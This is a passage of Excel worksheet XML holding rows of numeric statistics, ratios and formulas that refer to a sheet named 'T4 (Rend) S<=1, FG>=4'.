        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!D9</f>
        <v>1306</v>
      </c>
      <c r="E8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!E9</f>
        <v>200430</v>
      </c>
      <c r="F8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!F9</f>
        <v>3309</v>
      </c>
      <c r="G8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!G9</f>
        <v>203672</v>
      </c>
      <c r="H8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!H9</f>
        <v>2</v>
      </c>
      <c r="I8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!I9</f>
        <v>1702</v>
      </c>
      <c r="J8" s="311">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!J9</f>
        <v>3006</v>
      </c>
      <c r="K8" s="451">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!K9</f>
        <v>345</v>
      </c>
      <c r="L8" s="454">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!L9</f>
        <v>343171</v>
      </c>
      <c r="M8" s="449">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!M9</f>
        <v>19761</v>
      </c>
      <c r="N8" s="454">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!N9</f>
        <v>2488061</v>
      </c>
      <c r="O8" s="572"/>
      <c r="P8" s="572"/>
      <c r="Q8" s="572"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="12.2" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!B13</f>
        <v>6417</v>
      </c>
      <c r="C9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!C13</f>
        <v>338311</v>
      </c>
      <c r="D9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!D13</f>
        <v>344728</v>
      </c>
      <c r="E9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!E13</f>
        <v>2445673</v>
      </c>
      <c r="F9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!F13</f>
        <v>571742</v>
      </c>
      <c r="G9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!G13</f>
        <v>3017415</v>
      </c>
      <c r="H9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!H13</f>
        <v>6420</v>
      </c>
      <c r="I9" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!I13</f>
        <v>14558</v>
      </c>
      <c r="J9" s="311">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!J13</f>
        <v>352879</v>
      </c>
      <c r="K9" s="451">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!K13</f>
        <v>4224161</v>
      </c>
      <c r="L9" s="454">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!L13</f>
        <v>22211706</v>
      </c>
      <c r="M9" s="449">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!M13</f>
        <v>28</v>
      </c>
      <c r="N9" s="454">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!N13</f>
        <v>24694</v>
      </c>
      <c r="O9" s="572"/>
      <c r="P9" s="572"/>
      <c r="Q9" s="572"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1" thickBot="1">
      <c r="A10" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!B18</f>
        <v>77.313253012048193</v>
      </c>
      <c r="C10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!C18</f>
        <v>276.62387571545378</v>
      </c>
      <c r="D10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!D18</f>
        <v>263.95712098009187</v>
      </c>
      <c r="E10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!E18</f>
        <v>12.202130419597864</v>
      </c>
      <c r="F10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!F18</f>
        <v>172.78392263523722</v>
      </c>
      <c r="G10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!G18</f>
        <v>14.815070309124474</v>
      </c>
      <c r="H10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!H18</f>
        <v>3210</v>
      </c>
      <c r="I10" s="283">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!I18</f>
        <v>8.5534665099882492</v>
      </c>
      <c r="J10" s="313">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!J18</f>
        <v>117.3915502328676</v>
      </c>
      <c r="K10" s="452">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!K18</f>
        <v>12243.944927536231</v>
      </c>
      <c r="L10" s="457">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!L18</f>
        <v>64.724892254881681</v>
      </c>
      <c r="M10" s="453">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!M18</f>
        <v>1.4169323414806943E-3</v>
      </c>
      <c r="N10" s="457">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!N18</f>
        <v>9.9249978195872206E-3</v>
      </c>
      <c r="O10" s="572"/>
      <c r="P10" s="572"/>
      <c r="Q10" s="572"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A11" s="734" t="s">
        <v>4461</v>
      </c>
      <c r="B11" s="735"/>
      <c r="C11" s="735"/>
      <c r="D11" s="735"/>
      <c r="E11" s="735"/>
      <c r="F11" s="735"/>
      <c r="G11" s="735"/>
      <c r="H11" s="735"/>
      <c r="I11" s="735"/>
      <c r="J11" s="735"/>
      <c r="K11" s="735"/>
      <c r="L11" s="735"/>
      <c r="M11" s="735"/>
      <c r="N11" s="736"/>
      <c r="O11" s="572"/>
      <c r="P11" s="572"/>
      <c r="Q11" s="572"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="14.25" customHeight="1">
      <c r="A12" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B12" s="546">
        <v>0.28603899999999999</v>
      </c>
      <c r="C12" s="546">
        <v>0.57996700000000001</v>
      </c>
      <c r="D12" s="546">
        <v>0.61791300000000005</v>
      </c>
      <c r="E12" s="546">
        <v>0.71349200000000002</v>
      </c>
      <c r="F12" s="546">
        <v>0.63245099999999999</v>
      </c>
      <c r="G12" s="546">
        <v>0.79770300000000005</v>
      </c>
      <c r="H12" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I12" s="546">
        <v>0.457264</v>
      </c>
      <c r="J12" s="547">
        <v>0.67419799999999996</v>
      </c>
      <c r="K12" s="548">
        <v>0.61791399999999996</v>
      </c>
      <c r="L12" s="549">
        <v>0.83117799999999997</v>
      </c>
      <c r="M12" s="550">
        <v>0.415605</v>
      </c>
      <c r="N12" s="549">
        <v>0.72613499999999997</v>
      </c>
      <c r="O12" s="214"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="36.75" customHeight="1">
      <c r="A13" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B13" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="C13" s="260" t="s">
        <v>4631</v>
      </c>
      <c r="D13" s="260" t="s">
        <v>4632</v>
      </c>
      <c r="E13" s="260" t="s">
        <v>4633</v>
      </c>
      <c r="F13" s="260" t="s">
        <v>4634</v>
      </c>
      <c r="G13" s="260" t="s">
        <v>4635</v>
      </c>
      <c r="H13" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I13" s="260" t="s">
        <v>4636</v>
      </c>
      <c r="J13" s="312" t="s">
        <v>4637</v>
      </c>
      <c r="K13" s="436" t="s">
        <v>4773</v>
      </c>
      <c r="L13" s="437" t="s">
        <v>4850</v>
      </c>
      <c r="M13" s="315" t="s">
        <v>4129</v>
      </c>
      <c r="N13" s="437" t="s">
        <v>4769</v>
      </c>
      <c r="O13" s="262"/>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="25.5">
      <c r="A14" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B14" s="281">
        <v>1</v>
      </c>
      <c r="C14" s="281">
        <v>4</v>
      </c>
      <c r="D14" s="281">
        <v>5</v>
      </c>
      <c r="E14" s="281">
        <v>20</v>
      </c>
      <c r="F14" s="281">
        <v>11</v>
      </c>
      <c r="G14" s="281">
        <v>31</v>
      </c>
      <c r="H14" s="281">
        <v>1</v>
      </c>
      <c r="I14" s="281">
        <v>2</v>
      </c>
      <c r="J14" s="454">
        <v>6</v>
      </c>
      <c r="K14" s="449">
        <v>4</v>
      </c>
      <c r="L14" s="454">
        <v>58</v>
      </c>
      <c r="M14" s="449"/>
      <c r="N14" s="454">
        <v>1</v>
      </c>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19">
      <c r="A15" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B15" s="364" t="s">
        <v>4638</v>
      </c>
      <c r="C15" s="364" t="s">
        <v>4639</v>
      </c>
      <c r="D15" s="364" t="s">
        <v>4640</v>
      </c>
      <c r="E15" s="364" t="s">
        <v>4599</v>
      </c>
      <c r="F15" s="364" t="s">
        <v>4641</v>
      </c>
      <c r="G15" s="364" t="s">
        <v>4552</v>
      </c>
      <c r="H15" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I15" s="364" t="s">
        <v>4642</v>
      </c>
      <c r="J15" s="456" t="s">
        <v>4643</v>
      </c>
      <c r="K15" s="613" t="s">
        <v>4640</v>
      </c>
      <c r="L15" s="456" t="s">
        <v>4655</v>
      </c>
      <c r="M15" s="364"/>
      <c r="N15" s="456" t="s">
        <v>4781</v>
      </c>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19">
      <c r="A16" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B16" s="281">
        <f>B18+B17</f>
        <v>107</v>
      </c>
      <c r="C16" s="281">
        <f t="shared" ref="C16:J16" si="1">C18+C17</f>
        <v>1566</v>
      </c>
      <c r="D16" s="281">
        <f t="shared" si="1"/>
        <v>1673</v>
      </c>
      <c r="E16" s="281">
        <f t="shared" si="1"/>
        <v>6223</v>
      </c>
      <c r="F16" s="281">
        <f t="shared" si="1"/>
        <v>4418</v>
      </c>
      <c r="G16" s="281">
        <f t="shared" si="1"/>
        <v>10574</v>
      </c>
      <c r="H16" s="281">
        <f t="shared" si="1"/>
        <v>24</v>
      </c>
      <c r="I16" s="281">
        <f t="shared" si="1"/>
        <v>1816</v>
      </c>
      <c r="J16" s="311">
        <f t="shared" si="1"/>
        <v>3465</v>
      </c>
      <c r="K16" s="656">
        <f>K17+K18</f>
        <v>513</v>
      </c>
      <c r="L16" s="449">
        <f t="shared" ref="L16:N16" si="2">L17+L18</f>
        <v>189525</v>
      </c>
      <c r="M16" s="656"/>
      <c r="N16" s="458">
        <f t="shared" si="2"/>
        <v>2507854</v>
      </c>
      <c r="O16" s="572"/>
      <c r="P16" s="572"/>
      <c r="Q16" s="572"/>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:19">
      <c r="A17" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B17" s="281">
        <v>82</v>
      </c>
      <c r="C17" s="281">
        <v>1220</v>
      </c>
      <c r="D17" s="281">
        <v>1302</v>
      </c>
      <c r="E17" s="281">
        <v>2722</v>
      </c>
      <c r="F17" s="281">
        <v>3263</v>
      </c>
      <c r="G17" s="281">
        <v>5918</v>
      </c>
      <c r="H17" s="281">
        <v>1</v>
      </c>
      <c r="I17" s="281">
        <v>1701</v>
      </c>
      <c r="J17" s="454">
        <v>3002</v>
      </c>
      <c r="K17" s="314">
        <v>319</v>
      </c>
      <c r="L17" s="454">
        <v>183562</v>
      </c>
      <c r="M17" s="281"/>
      <c r="N17" s="454">
        <v>2507822</v>
      </c>
      <c r="O17" s="572"/>
      <c r="P17" s="572"/>
      <c r="Q17" s="572"/>
      <c r="S17" s="214"/>
    </row>
    <row r="18" spans="1:19">
      <c r="A18" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B18" s="281">
        <v>25</v>
      </c>
      <c r="C18" s="281">
        <v>346</v>
      </c>
      <c r="D18" s="281">
        <v>371</v>
      </c>
      <c r="E18" s="281">
        <v>3501</v>
      </c>
      <c r="F18" s="281">
        <v>1155</v>
      </c>
      <c r="G18" s="281">
        <v>4656</v>
      </c>
      <c r="H18" s="281">
        <v>23</v>
      </c>
      <c r="I18" s="281">
        <v>115</v>
      </c>
      <c r="J18" s="454">
        <v>463</v>
      </c>
      <c r="K18" s="314">
        <v>194</v>
      </c>
      <c r="L18" s="454">
        <v>5963</v>
      </c>
      <c r="M18" s="281"/>
      <c r="N18" s="454">
        <v>32</v>
      </c>
      <c r="O18" s="572"/>
      <c r="P18" s="572"/>
      <c r="Q18" s="572"/>
      <c r="S18" s="214"/>
    </row>
    <row r="19" spans="1:19" ht="26.25" thickBot="1">
      <c r="A19" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B19" s="283">
        <f>B18/B17</f>
        <v>0.3048780487804878</v>
      </c>
      <c r="C19" s="283">
        <f t="shared" ref="C19:J19" si="3">C18/C17</f>
        <v>0.28360655737704921</v>
      </c>
      <c r="D19" s="283">
        <f t="shared" si="3"/>
        <v>0.28494623655913981</v>
      </c>
      <c r="E19" s="283">
        <f t="shared" si="3"/>
        <v>1.2861866274797942</v>
      </c>
      <c r="F19" s="283">
        <f t="shared" si="3"/>
        <v>0.3539687404229237</v>
      </c>
      <c r="G19" s="283">
        <f t="shared" si="3"/>
        <v>0.78675228117607299</v>
      </c>
      <c r="H19" s="283">
        <f t="shared" si="3"/>
        <v>23</v>
      </c>
      <c r="I19" s="283">
        <f t="shared" si="3"/>
        <v>6.7607289829512057E-2</v>
      </c>
      <c r="J19" s="313">
        <f t="shared" si="3"/>
        <v>0.15423051299133911</v>
      </c>
      <c r="K19" s="368">
        <v>0.45689999999999997</v>
      </c>
      <c r="L19" s="657">
        <v>0.72060000000000002</v>
      </c>
      <c r="M19" s="459"/>
      <c r="N19" s="457">
        <v>0</v>
      </c>
      <c r="O19" s="572"/>
      <c r="P19" s="572"/>
      <c r="Q19" s="572"/>
      <c r="S19" s="214"/>
    </row>
    <row r="20" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A20" s="737" t="s">
        <v>4462</v>
      </c>
      <c r="B20" s="735"/>
      <c r="C20" s="735"/>
      <c r="D20" s="735"/>
      <c r="E20" s="735"/>
      <c r="F20" s="735"/>
      <c r="G20" s="735"/>
      <c r="H20" s="735"/>
      <c r="I20" s="735"/>
      <c r="J20" s="735"/>
      <c r="K20" s="735"/>
      <c r="L20" s="735"/>
      <c r="M20" s="735"/>
      <c r="N20" s="736"/>
      <c r="O20" s="572"/>
      <c r="P20" s="572"/>
      <c r="Q20" s="572"/>
      <c r="S20" s="214"/>
    </row>
    <row r="21" spans="1:19" ht="14.25" customHeight="1">
      <c r="A21" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B21" s="546">
        <v>0.28603899999999999</v>
      </c>
      <c r="C21" s="546">
        <v>0.57996700000000001</v>
      </c>
      <c r="D21" s="546">
        <v>0.61791300000000005</v>
      </c>
      <c r="E21" s="546">
        <v>0.71347700000000003</v>
      </c>
      <c r="F21" s="546">
        <v>0.63244900000000004</v>
      </c>
      <c r="G21" s="546">
        <v>0.79768300000000003</v>
      </c>
      <c r="H21" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I21" s="546">
        <v>0.457264</v>
      </c>
      <c r="J21" s="547">
        <v>0.67419799999999996</v>
      </c>
      <c r="K21" s="548">
        <v>0.61791399999999996</v>
      </c>
      <c r="L21" s="549">
        <v>0.86334599999999995</v>
      </c>
      <c r="M21" s="550">
        <v>0.415605</v>
      </c>
      <c r="N21" s="549">
        <v>0.72613499999999997</v>
      </c>
      <c r="O21" s="214"/>
      <c r="S21" s="214"/>
    </row>
    <row r="22" spans="1:19" ht="36.75" customHeight="1">
      <c r="A22" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B22" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="C22" s="260" t="s">
        <v>4631</v>
      </c>
      <c r="D22" s="260" t="s">
        <v>4632</v>
      </c>
      <c r="E22" s="260" t="s">
        <v>4644</v>
      </c>
      <c r="F22" s="260" t="s">
        <v>4645</v>
      </c>
      <c r="G22" s="260" t="s">
        <v>4646</v>
      </c>
      <c r="H22" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I22" s="260" t="s">
        <v>4636</v>
      </c>
      <c r="J22" s="312" t="s">
        <v>4637</v>
      </c>
      <c r="K22" s="436" t="s">
        <v>4773</v>
      </c>
      <c r="L22" s="437" t="s">
        <v>4851</v>
      </c>
      <c r="M22" s="315" t="s">
        <v>4129</v>
      </c>
      <c r="N22" s="437" t="s">
        <v>4769</v>
      </c>
      <c r="O22" s="262"/>
      <c r="S22" s="214"/>
    </row>
    <row r="23" spans="1:19" ht="25.5">
      <c r="A23" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B23" s="281">
        <v>1</v>
      </c>
      <c r="C23" s="281">
        <v>4</v>
      </c>
      <c r="D23" s="281">
        <v>5</v>
      </c>
      <c r="E23" s="281">
        <v>14</v>
      </c>
      <c r="F23" s="281">
        <v>10</v>
      </c>
      <c r="G23" s="281">
        <v>24</v>
      </c>
      <c r="H23" s="281">
        <v>1</v>
      </c>
      <c r="I23" s="281">
        <v>2</v>
      </c>
      <c r="J23" s="454">
        <v>6</v>
      </c>
      <c r="K23" s="314">
        <v>4</v>
      </c>
      <c r="L23" s="454">
        <v>53</v>
      </c>
      <c r="M23" s="281"/>
      <c r="N23" s="454">
        <v>1</v>
      </c>
      <c r="S23" s="214"/>
    </row>
    <row r="24" spans="1:19">
      <c r="A24" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B24" s="364" t="s">
        <v>4638</v>
      </c>
      <c r="C24" s="364" t="s">
        <v>4639</v>
      </c>
      <c r="D24" s="364" t="s">
        <v>4640</v>
      </c>
      <c r="E24" s="364" t="s">
        <v>4599</v>
      </c>
      <c r="F24" s="364" t="s">
        <v>4641</v>
      </c>
      <c r="G24" s="364" t="s">
        <v>4552</v>
      </c>
      <c r="H24" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I24" s="364" t="s">
        <v>4642</v>
      </c>
      <c r="J24" s="456" t="s">
        <v>4643</v>
      </c>
      <c r="K24" s="613" t="s">
        <v>4640</v>
      </c>
      <c r="L24" s="456" t="s">
        <v>4559</v>
      </c>
      <c r="M24" s="364"/>
      <c r="N24" s="456" t="s">
        <v>4781</v>
      </c>
      <c r="S24" s="214"/>
    </row>
    <row r="25" spans="1:19">
      <c r="A25" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B25" s="281">
        <f t="shared" ref="B25:J25" si="4">B27+B26</f>
        <v>107</v>
      </c>
      <c r="C25" s="281">
        <f t="shared" si="4"/>
        <v>1566</v>
      </c>
      <c r="D25" s="281">
        <f t="shared" si="4"/>
        <v>1673</v>
      </c>
      <c r="E25" s="281">
        <f t="shared" si="4"/>
        <v>11039</v>
      </c>
      <c r="F25" s="281">
        <f t="shared" si="4"/>
        <v>4987</v>
      </c>
      <c r="G25" s="281">
        <f t="shared" si="4"/>
        <v>15959</v>
      </c>
      <c r="H25" s="281">
        <f t="shared" si="4"/>
        <v>24</v>
      </c>
      <c r="I25" s="281">
        <f t="shared" si="4"/>
        <v>1816</v>
      </c>
      <c r="J25" s="311">
        <f t="shared" si="4"/>
        <v>3465</v>
      </c>
      <c r="K25" s="656">
        <f>K26+K27</f>
        <v>513</v>
      </c>
      <c r="L25" s="449">
        <f t="shared" ref="L25" si="5">L26+L27</f>
        <v>193194</v>
      </c>
      <c r="M25" s="656"/>
      <c r="N25" s="458">
        <f t="shared" ref="N25" si="6">N26+N27</f>
        <v>2507854</v>
      </c>
      <c r="O25" s="572"/>
      <c r="P25" s="572"/>
      <c r="Q25" s="572"/>
      <c r="S25" s="214"/>
    </row>
    <row r="26" spans="1:19">
      <c r="A26" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B26" s="281">
        <v>82</v>
      </c>
      <c r="C26" s="281">
        <v>1220</v>
      </c>
      <c r="D26" s="281">
        <v>1302</v>
      </c>
      <c r="E26" s="281">
        <v>2821</v>
      </c>
      <c r="F26" s="281">
        <v>3263</v>
      </c>
      <c r="G26" s="281">
        <v>6017</v>
      </c>
      <c r="H26" s="281">
        <v>1</v>
      </c>
      <c r="I26" s="281">
        <v>1701</v>
      </c>
      <c r="J26" s="454">
        <v>3002</v>
      </c>
      <c r="K26" s="314">
        <v>319</v>
      </c>
      <c r="L26" s="454">
        <v>183581</v>
      </c>
      <c r="M26" s="281"/>
      <c r="N26" s="454">
        <v>2507822</v>
      </c>
      <c r="O26" s="572"/>
      <c r="P26" s="572"/>
      <c r="Q26" s="572"/>
      <c r="S26" s="214"/>
    </row>
    <row r="27" spans="1:19">
      <c r="A27" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B27" s="281">
        <v>25</v>
      </c>
      <c r="C27" s="281">
        <v>346</v>
      </c>
      <c r="D27" s="281">
        <v>371</v>
      </c>
      <c r="E27" s="281">
        <v>8218</v>
      </c>
      <c r="F27" s="281">
        <v>1724</v>
      </c>
      <c r="G27" s="281">
        <v>9942</v>
      </c>
      <c r="H27" s="281">
        <v>23</v>
      </c>
      <c r="I27" s="281">
        <v>115</v>
      </c>
      <c r="J27" s="454">
        <v>463</v>
      </c>
      <c r="K27" s="314">
        <v>194</v>
      </c>
      <c r="L27" s="454">
        <v>9613</v>
      </c>
      <c r="M27" s="281"/>
      <c r="N27" s="454">
        <v>32</v>
      </c>
      <c r="O27" s="572"/>
      <c r="P27" s="572"/>
      <c r="Q27" s="572"/>
      <c r="S27" s="214"/>
    </row>
    <row r="28" spans="1:19" ht="26.25" thickBot="1">
      <c r="A28" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B28" s="283">
        <f t="shared" ref="B28:J28" si="7">B27/B26</f>
        <v>0.3048780487804878</v>
      </c>
      <c r="C28" s="283">
        <f t="shared" si="7"/>
        <v>0.28360655737704921</v>
      </c>
      <c r="D28" s="283">
        <f t="shared" si="7"/>
        <v>0.28494623655913981</v>
      </c>
      <c r="E28" s="283">
        <f t="shared" si="7"/>
        <v>2.9131513647642682</v>
      </c>
      <c r="F28" s="283">
        <f t="shared" si="7"/>
        <v>0.52834814587802637</v>
      </c>
      <c r="G28" s="283">
        <f t="shared" si="7"/>
        <v>1.6523184311118497</v>
      </c>
      <c r="H28" s="283">
        <f t="shared" si="7"/>
        <v>23</v>
      </c>
      <c r="I28" s="283">
        <f t="shared" si="7"/>
        <v>6.7607289829512057E-2</v>
      </c>
      <c r="J28" s="283">
        <f t="shared" si="7"/>
        <v>0.15423051299133911</v>
      </c>
      <c r="K28" s="368">
        <v>0.45689999999999997</v>
      </c>
      <c r="L28" s="457">
        <v>1.1440999999999999</v>
      </c>
      <c r="M28" s="459"/>
      <c r="N28" s="457">
        <v>0</v>
      </c>
      <c r="O28" s="572"/>
      <c r="P28" s="572"/>
      <c r="Q28" s="572"/>
      <c r="S28" s="214"/>
    </row>
    <row r="29" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A29" s="734" t="s">
        <v>4312</v>
      </c>
      <c r="B29" s="735"/>
      <c r="C29" s="735"/>
      <c r="D29" s="735"/>
      <c r="E29" s="735"/>
      <c r="F29" s="735"/>
      <c r="G29" s="735"/>
      <c r="H29" s="735"/>
      <c r="I29" s="735"/>
      <c r="J29" s="735"/>
      <c r="K29" s="735"/>
      <c r="L29" s="735"/>
      <c r="M29" s="735"/>
      <c r="N29" s="736"/>
      <c r="O29" s="572"/>
      <c r="P29" s="572"/>
      <c r="Q29" s="572"/>
      <c r="S29" s="214"/>
    </row>
    <row r="30" spans="1:19" ht="14.25" customHeight="1">
      <c r="A30" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B30" s="546">
        <v>0.28602699999999998</v>
      </c>
      <c r="C30" s="546">
        <v>0.57935199999999998</v>
      </c>
      <c r="D30" s="546">
        <v>0.617232</v>
      </c>
      <c r="E30" s="546">
        <v>0.82563399999999998</v>
      </c>
      <c r="F30" s="546">
        <v>0.65195099999999995</v>
      </c>
      <c r="G30" s="546">
        <v>0.85668500000000003</v>
      </c>
      <c r="H30" s="546">
        <v>9.5341999999999996E-2</v>
      </c>
      <c r="I30" s="546">
        <v>0.45724599999999999</v>
      </c>
      <c r="J30" s="547">
        <v>0.67345500000000003</v>
      </c>
      <c r="K30" s="548">
        <v>0.62907599999999997</v>
      </c>
      <c r="L30" s="549">
        <v>0.833673</v>
      </c>
      <c r="M30" s="550">
        <v>0.415605</v>
      </c>
      <c r="N30" s="549">
        <v>0.72613499999999997</v>
      </c>
      <c r="O30" s="214" t="s">
        <v>2311</v>
      </c>
      <c r="S30" s="214"/>
    </row>
    <row r="31" spans="1:19" ht="36.75" customHeight="1">
      <c r="A31" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B31" s="260" t="s">
        <v>4647</v>
      </c>
      <c r="C31" s="260" t="s">
        <v>4648</v>
      </c>
      <c r="D31" s="260" t="s">
        <v>4649</v>
      </c>
      <c r="E31" s="260" t="s">
        <v>4650</v>
      </c>
      <c r="F31" s="260" t="s">
        <v>4651</v>
      </c>
      <c r="G31" s="260" t="s">
        <v>4652</v>
      </c>
      <c r="H31" s="260" t="s">
        <v>4129</v>
      </c>
      <c r="I31" s="260" t="s">
        <v>4653</v>
      </c>
      <c r="J31" s="312" t="s">
        <v>4654</v>
      </c>
      <c r="K31" s="436" t="s">
        <v>4776</v>
      </c>
      <c r="L31" s="437" t="s">
        <v>4852</v>
      </c>
      <c r="M31" s="315" t="s">
        <v>4777</v>
      </c>
      <c r="N31" s="437" t="s">
        <v>4853</v>
      </c>
      <c r="O31" s="262" t="s">
        <v>1765</v>
      </c>
      <c r="S31" s="214"/>
    </row>
    <row r="32" spans="1:19" ht="25.5">
      <c r="A32" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B32" s="281">
        <v>1</v>
      </c>
      <c r="C32" s="281">
        <v>9</v>
      </c>
      <c r="D32" s="281">
        <v>10</v>
      </c>
      <c r="E32" s="281">
        <v>57</v>
      </c>
      <c r="F32" s="281">
        <v>26</v>
      </c>
      <c r="G32" s="281">
        <v>83</v>
      </c>
      <c r="H32" s="281">
        <v>0</v>
      </c>
      <c r="I32" s="281">
        <v>7</v>
      </c>
      <c r="J32" s="454">
        <v>17</v>
      </c>
      <c r="K32" s="449">
        <v>5</v>
      </c>
      <c r="L32" s="454">
        <v>78</v>
      </c>
      <c r="M32" s="449">
        <v>2</v>
      </c>
      <c r="N32" s="454">
        <v>3</v>
      </c>
      <c r="S32" s="214"/>
    </row>
    <row r="33" spans="1:19">
      <c r="A33" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B33" s="364" t="s">
        <v>4638</v>
      </c>
      <c r="C33" s="364" t="s">
        <v>4639</v>
      </c>
      <c r="D33" s="364" t="s">
        <v>4640</v>
      </c>
      <c r="E33" s="364" t="s">
        <v>4655</v>
      </c>
      <c r="F33" s="364" t="s">
        <v>4656</v>
      </c>
      <c r="G33" s="364" t="s">
        <v>4559</v>
      </c>
      <c r="H33" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I33" s="364" t="s">
        <v>4642</v>
      </c>
      <c r="J33" s="456" t="s">
        <v>4643</v>
      </c>
      <c r="K33" s="613">
        <v>0.41212121212121217</v>
      </c>
      <c r="L33" s="456">
        <v>0.86666666666666659</v>
      </c>
      <c r="M33" s="364">
        <v>0.17272727272727273</v>
      </c>
      <c r="N33" s="456">
        <v>0.5</v>
      </c>
      <c r="S33" s="214"/>
    </row>
    <row r="34" spans="1:19">
      <c r="A34" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B34" s="281">
        <f t="shared" ref="B34:J34" si="8">B36+B35</f>
        <v>6498</v>
      </c>
      <c r="C34" s="281">
        <f t="shared" si="8"/>
        <v>337832</v>
      </c>
      <c r="D34" s="281">
        <f t="shared" si="8"/>
        <v>344330</v>
      </c>
      <c r="E34" s="281">
        <f t="shared" si="8"/>
        <v>2618456</v>
      </c>
      <c r="F34" s="281">
        <f t="shared" si="8"/>
        <v>564457</v>
      </c>
      <c r="G34" s="281">
        <f t="shared" si="8"/>
        <v>3182846</v>
      </c>
      <c r="H34" s="281">
        <f t="shared" si="8"/>
        <v>6422</v>
      </c>
      <c r="I34" s="281">
        <f t="shared" si="8"/>
        <v>8137</v>
      </c>
      <c r="J34" s="311">
        <f t="shared" si="8"/>
        <v>346058</v>
      </c>
      <c r="K34" s="656">
        <f>K35+K36</f>
        <v>4224329</v>
      </c>
      <c r="L34" s="449">
        <f t="shared" ref="L34" si="9">L35+L36</f>
        <v>21401224</v>
      </c>
      <c r="M34" s="656">
        <f t="shared" ref="M34" si="10">M35+M36</f>
        <v>19761</v>
      </c>
      <c r="N34" s="458">
        <f t="shared" ref="N34" si="11">N35+N36</f>
        <v>2507826</v>
      </c>
      <c r="O34" s="572"/>
      <c r="P34" s="572"/>
      <c r="Q34" s="572"/>
      <c r="S34" s="214"/>
    </row>
    <row r="35" spans="1:19">
      <c r="A35" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B35" s="281">
        <v>83</v>
      </c>
      <c r="C35" s="281">
        <v>1223</v>
      </c>
      <c r="D35" s="281">
